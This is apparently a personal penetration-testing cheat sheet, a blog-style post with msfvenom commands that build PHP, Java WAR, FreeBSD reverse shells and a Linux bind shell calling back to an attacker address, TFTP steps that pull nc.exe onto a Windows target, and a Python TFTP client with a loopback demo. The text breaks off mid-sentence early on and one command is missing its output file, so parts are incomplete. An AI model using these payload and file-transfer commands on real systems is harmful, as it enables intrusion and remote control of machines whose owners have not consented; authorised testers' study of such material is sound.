What are the odds of gaining initial access and doing some reconnaissance using PowerShell? Sounds interesting, right? Let's test this out. The PowerSploit project is simply a superb resource if you want to dig into it more. Download link: https://github.com/PowerShellMafia/PowerSploit/ Download it from GitHub and drop the folder into one of your PowerShell module directories (the paths listed in $Env:PSModulePath) so that its modules can be imported.
Scenario: you have initial access to a web app or system and have found credentials that can be used to run commands (perhaps the pentester already has a reverse shell through the web app), and you are able to create an admin account on the machine, but every port is locked down except the web ports. The following script can be helpful to
This post only serves as instructions for myself. Should you like it and use it, please bear in mind that it does not come with any warranty. Thanks to absolomb's blog for the idea; I am only trying to use his material and improve it where necessary to my advantage.
PHP reverse shell
    msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
Java WAR reverse shell
    msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
Linux bind shell (x86, C output, NUL/LF/CR/space excluded as bad characters, encoded with shikata_ga_nai)
    msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
FreeBSD reverse shell (x64, ELF output)
    msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o
File Transfers
A non-interactive shell limits which commands you can use, so choose transfer methods that do not need an interactive prompt. See https://blog.netspi.com/15-ways-to-download-a-file/ for more options.
TFTP
Windows XP and Windows Server 2003 include a tftp client; Windows 7 does not by default. TFTP clients are usually non-interactive, so they work through an obtained shell.
Attacker (serve /tftp on UDP 69):
    atftpd --daemon --port 69 /tftp
Target:
    Windows> tftp -i 10.10.10.10 GET nc.exe
FTP
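As an added example (my own code, not from the original page, absolomb's blog or the PowerSploit project): a minimal TFTP read client in Python that performs the same RFC 1350 octet-mode exchange that "tftp -i 10.10.10.10 GET nc.exe" runs against atftpd, together with a constructed single-shot loopback server that stands in for atftpd only so the block runs offline. It is handy for checking your atftpd setup from the attacker box, or on a Linux foothold that has python but no tftp client. The filename "nc.exe" and the 1284-byte payload are constructed sample data, not a real binary; the client handles the server's change of port (transfer ID), 16-bit block-number wrap, duplicate blocks and ERROR packets, but does not retransmit on timeout.

```python
import socket
import struct
import threading

# Opcodes and block size from RFC 1350 (TFTP revision 2).
OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5
BLOCK_SIZE = 512


def build_rrq(filename, mode="octet"):
    """Read request: opcode 1, filename, NUL, mode, NUL. 'octet' is what tftp.exe -i sends."""
    return struct.pack("!H", OP_RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def build_data(block, payload):
    """DATA packet: opcode 3, 16-bit block number (wraps at 65536), up to 512 payload bytes."""
    return struct.pack("!HH", OP_DATA, block & 0xFFFF) + payload


def build_ack(block):
    """ACK packet: opcode 4, 16-bit block number."""
    return struct.pack("!HH", OP_ACK, block & 0xFFFF)


def parse_packet(pkt):
    """Return (opcode, block-or-errcode, payload) for DATA, ACK and ERROR packets."""
    if len(pkt) < 4:
        raise ValueError("short TFTP packet")
    opcode, num = struct.unpack("!HH", pkt[:4])
    if opcode in (OP_DATA, OP_ACK):
        return opcode, num, pkt[4:]
    if opcode == OP_ERROR:
        return opcode, num, pkt[4:].split(b"\x00")[0]
    raise ValueError(f"unexpected TFTP opcode {opcode}")


def tftp_get(host, port, filename, timeout=5.0):
    """Fetch `filename` from a TFTP server in octet mode and return its bytes."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_rrq(filename), (host, port))
    tid, expected, chunks = None, 1, []
    try:
        while True:
            pkt, addr = sock.recvfrom(4 + BLOCK_SIZE)
            if tid is None:
                tid = addr          # the server answers from a fresh port: its transfer ID
            elif addr != tid:
                continue            # RFC 1350: ignore datagrams from any other TID
            opcode, num, payload = parse_packet(pkt)
            if opcode == OP_ERROR:
                raise RuntimeError(f"TFTP error {num}: {payload.decode(errors='replace')}")
            if opcode != OP_DATA:
                continue
            if num == expected & 0xFFFF:
                chunks.append(payload)
                sock.sendto(build_ack(num), tid)
                if len(payload) < BLOCK_SIZE:   # a short block ends the transfer
                    break
                expected += 1
            elif num == (expected - 1) & 0xFFFF:
                sock.sendto(build_ack(num), tid)  # duplicate block: re-ACK, never re-append
    finally:
        sock.close()
    return b"".join(chunks)


def _serve_one_file(listener, name, data):
    """Constructed single-shot TFTP read server for the loopback demo (stands in for atftpd)."""
    listener.settimeout(5)
    pkt, client = listener.recvfrom(4 + BLOCK_SIZE)
    if struct.unpack("!H", pkt[:2])[0] != OP_RRQ or pkt[2:].split(b"\x00")[0] != name.encode():
        listener.sendto(struct.pack("!HH", OP_ERROR, 1) + b"File not found\x00", client)
        return
    xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # new socket == new TID
    xfer.settimeout(5)
    block, offset = 1, 0
    while True:
        chunk = data[offset:offset + BLOCK_SIZE]     # empty final block if len % 512 == 0
        xfer.sendto(build_data(block, chunk), client)
        opcode, num, _ = parse_packet(xfer.recvfrom(4)[0])
        if opcode == OP_ACK and num == block & 0xFFFF:
            if len(chunk) < BLOCK_SIZE:
                break
            block, offset = block + 1, offset + BLOCK_SIZE
    xfer.close()


def run_loopback_demo():
    """Serve a constructed 1284-byte 'nc.exe' on 127.0.0.1 and pull it back with tftp_get."""
    sample = bytes(range(256)) * 5 + b"\x00END"   # 2 full blocks plus a 260-byte final block
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", 0))                # port 0: the OS picks a free port
    port = listener.getsockname()[1]
    server = threading.Thread(target=_serve_one_file, args=(listener, "nc.exe", sample), daemon=True)
    server.start()
    fetched = tftp_get("127.0.0.1", port, "nc.exe")
    server.join(5)
    listener.close()
    return fetched == sample, len(fetched)
```

Against a real atftpd the call is simply tftp_get("10.10.10.10", 69, "nc.exe") and the returned bytes are written to disk; the loopback server in the block exists only so the example is verifiable without a network.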